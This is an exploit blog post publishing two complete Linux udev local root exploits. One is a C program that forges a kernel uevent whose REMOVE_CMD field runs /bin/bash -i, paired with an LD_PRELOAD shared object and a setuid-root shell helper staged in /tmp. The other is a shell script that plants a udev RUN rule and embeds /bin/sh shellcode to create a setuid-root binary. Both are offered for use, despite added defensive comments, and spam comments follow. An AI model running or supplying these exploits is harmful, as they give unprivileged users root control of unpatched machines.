
UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV: Kcope's version and the Underground bash version, have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

/* Netlink protocol number for kernel uevents; defined here only when the
 * system headers do not already provide it. */
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
/* Buffer-size and boolean constants. The visible main() uses only
 * SHORT_STRING and LONG_STRING; the others are not referenced. */
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

/* File-scope state used by main(): the netlink socket descriptor, the
 * destination address, and the message header with its single I/O vector. */
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
/* Not referenced anywhere in the visible code. */
int sz = 64*1024;

/*
 * Sender program (the listing later compiles it with `gcc ud.c -o /tmp/ud`).
 *
 * Builds a text message in the uevent layout ("action@devpath" followed by
 * NUL-separated KEY=value pairs) and sends it over a NETLINK_KOBJECT_UEVENT
 * socket to the netlink port id given in argv[1]. The header comments of the
 * script describe that id as the one belonging to udevd's netlink socket.
 * Afterwards it sleeps 10 seconds and execs /tmp/acc.
 *
 * NOTE(review): the security-relevant point is that this message is produced
 * by an ordinary userspace process, not by the kernel. A udev daemon that
 * acts on it is not validating the sender of the netlink datagram. Fixed udev
 * releases discard uevents that do not originate from the kernel, so the
 * mitigation is a patched udev package; confirm the installed version
 * against the distribution's advisory. For detection, a non-root process
 * opening an AF_NETLINK socket with protocol NETLINK_KOBJECT_UEVENT and
 * sending to a specific port id is unusual and can be audited at the
 * socket()/sendmsg() syscall level.
 *
 * argv[1]: netlink port id of the destination socket, parsed with atoi().
 * There is no return statement; on success execl() replaces the process.
 */
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
/* Fixed field values for the constructed event: action "add", subsystem
 * "block", path "/dev/foo", major 8, minor 1. */
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
/* Destination address: unicast (nl_groups = 0) to the caller-supplied id. */
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
/* The same address structure is passed to bind(). The results of socket(),
 * bind() and sendmsg() are not checked anywhere in this function. */
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
/* Each sprintf() length is advanced by one extra byte so the terminating NUL
 * stays in the buffer and separates the fields. */
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
/* Extra key carrying a command line. NOTE(review): presumably the udev rules
 * on the targeted systems execute the value of REMOVE_CMD with udevd's
 * privileges, which would make this field the payload; confirm against the
 * rules shipped with the affected udev. An event carrying REMOVE_CMD that
 * did not come from the kernel is an indicator worth alerting on. */
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
/* buf and buflen are assigned but never read. */
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
/* Waits, then replaces this process with /tmp/acc, the helper the listing
 * builds further down with `gcc -o /tmp/acc acc.c`. */
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}

# Builds the netlink sender from ud.c into /tmp/ud, then starts writing
# prog.c from a here-document whose body follows.
gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

/*
 * Initialisation routine of the shared object that the listing links as
 * slib_ex.so.1.0 (with -nostartfiles, which leaves out the standard startup
 * files that would otherwise supply their own _init).
 *
 * Sets gid and uid to 0, removes LD_PRELOAD from the environment, and
 * replaces the process with /bin/sh running /tmp/acc.
 *
 * NOTE(review): _init presumably runs as soon as the dynamic loader maps the
 * library, and the unsetenv() suggests the object is meant to be injected via
 * LD_PRELOAD into a process that is already privileged. The visible listing
 * never sets LD_PRELOAD, so confirm. setgid(0)/setuid(0) only succeed in a
 * process that already holds the privilege to change ids; their results are
 * not checked. For detection, an LD_PRELOAD value pointing into a
 * world-writable directory such as /tmp is a strong indicator.
 */
void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
# Compiles prog.c as position-independent code and links it into the shared
# object slib_ex.so.1.0; -nostartfiles omits the standard startup files.
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

/*
 * Helper that the listing compiles to /tmp/acc: sets gid and uid to 0 and
 * execs /bin/sh. The id changes only take effect when the process already
 * has the privilege to make them (for example when it is started by a root
 * process); the return values are not checked.
 *
 * Defensive note: a freshly compiled executable under /tmp whose only job is
 * setuid(0) followed by exec of a shell is a high-confidence indicator, and
 * mounting /tmp with noexec,nosuid restricts this staging pattern.
 */
int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
# Builds the helper as /tmp/acc, copies the shared object into /tmp, and runs
# the sender with the script's first argument (the netlink port id).
# Every artefact is staged under /tmp, which is where to look during triage.
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
#
# Reviewer summary: takes a udev KERNEL match string as $1, writes a helper
# script (usn.sh) and a small C program (usn.c) into the current directory,
# compiles the program, and appends a rule to /dev/.udev/rules.d/root.rules
# that adds usn.sh to the RUN list of matching events. When run, usn.sh
# makes the compiled binary root-owned and sets its setuid/setgid bits.
#
# NOTE(review): the append to the rules file only succeeds if the invoking
# user can write under /dev/.udev/rules.d. On a correctly configured host
# that directory should be root-owned and not group- or world-writable, so
# verify its ownership and mode. For detection, look for unexpected files in
# that directory, RUN+= targets outside system directories, and setuid-root
# binaries in user-writable locations.
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
# The here-document delimiter is unquoted, so $PWD is expanded now and usn.sh
# ends up holding absolute paths into the current directory.
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
# usn.c holds a byte string and a main() that stores the string's address two
# ints above a local variable. NOTE(review): presumably 32-bit x86 shellcode
# reached by overwriting main's saved return address; the bytes include the
# ASCII fragments "//bi" and "n/sh". Confirm by disassembly.
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
# Appends a rule: events whose KERNEL name matches $1 get usn.sh added to RUN.
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

That's the Underground one, which is nice and neat, fast and furiouz :>
Enjoy them all, old now anyhow..
XD

7 Responses to “UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN”

  1. Thanks a bunch for sharing this with all of us you actually know what you’re talking about! Bookmarked. Please also visit my site =). We could have a link exchange arrangement between us!

  2. June Chui says:

    I like this post, enjoyed this one appreciate it for putting up.

  3. Gertie Denby says:

    It’s nearly impossible to find knowledgeable men and women with this topic, and you sound like there’s a lot more you might be referring to! Thanks

  4. Dovie Klemke says:

    Greetings from Idaho! I’m bored at work so I decided to browse your blog on my iphone during lunch break. I really like the info you provide here and can’t wait to take a look when I get home. I’m amazed at how quick your blog loaded on my cell phone .. I’m not even using WIFI, just 3G .. Anyways, amazing blog!

  5. Mara Reitter says:

    excellent post, very informative. I wonder why the other experts of this sector don’t notice this. You must continue your writing. I’m sure, you have a great readers’ base already!

  6. It’s really a nice and helpful piece of information. I am glad that you shared this useful information with us. Please keep us informed like this. Thanks for sharing.


